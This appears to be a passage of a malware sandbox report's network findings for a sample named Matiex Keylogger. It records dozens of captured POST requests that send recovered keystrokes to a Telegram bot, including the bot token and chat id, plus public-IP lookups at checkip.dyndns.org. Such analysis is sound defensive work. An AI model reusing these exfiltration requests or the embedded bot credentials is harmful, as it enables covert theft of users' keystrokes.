                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d4ec94d0Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d4fd4624Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d512bd95Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d5236a93Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d538fcc6Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d5498ff6Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d557ddf3Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d5662ff3Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d57e03f9Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d58c540eHost: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d59d0412Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d5b27a2aHost: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d5c32945Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d5d17722Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d5f074aaHost: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d5fec3d2Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d6169b8bHost: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d624efc4Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d63cc195Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d64b0eb3Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d662e500Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d67134e7Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d6890bc9Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d6975a65Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d6a8090cHost: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d6bd7f75Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d6ce2e82Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d6dc7d19Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d6ed2d80Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d702a265Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d71352f1Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d728c812Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d739784aHost: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d747c727Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d7561608Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d76dec4cHost: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d77c3b57Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d79411d8Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d7a2616bHost: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d7b31105Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d7c15ec1Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d7d936a8Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d7e783c6Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d7f834e3Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d80da9a2Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d81e59abHost: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d82ca7c9Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d8447f7dHost: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d852ce2cHost: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d86aa52fHost: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d878f319Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d88741e8Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d897f253Host: api.telegram.orgContent-Length: 756
                          Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                          Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
                          Source: unknownHTTPS traffic detected: 172.67.188.154:443 -> 192.168.2.6:49752 version: TLS 1.0
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50733
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50732
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50735
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50734
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50737
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50736
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50739
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50738
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50726 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50730
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50693 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50211 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50452 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50177 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50744
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50743
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50746
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50578 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50745
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50853 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50748
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50747
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50440 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50165 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50749
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50740
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50742
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50741
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50325 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50600 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50967 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50292 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50738 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50755
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50754
                          Source: unknownNetwork traffic detected: HTTP traffic on port 51008 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50757
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50756
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50759
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50980 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50758
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50189 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50464 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50751
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50750
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50753
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50752
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50439 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50714 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50766
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50765
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50768
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50280 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50767
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50769
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50760
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50762
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50761
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50337 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50612 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50764
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50763
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50566 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50841 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50153 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50510 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50795 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50382 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50979 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
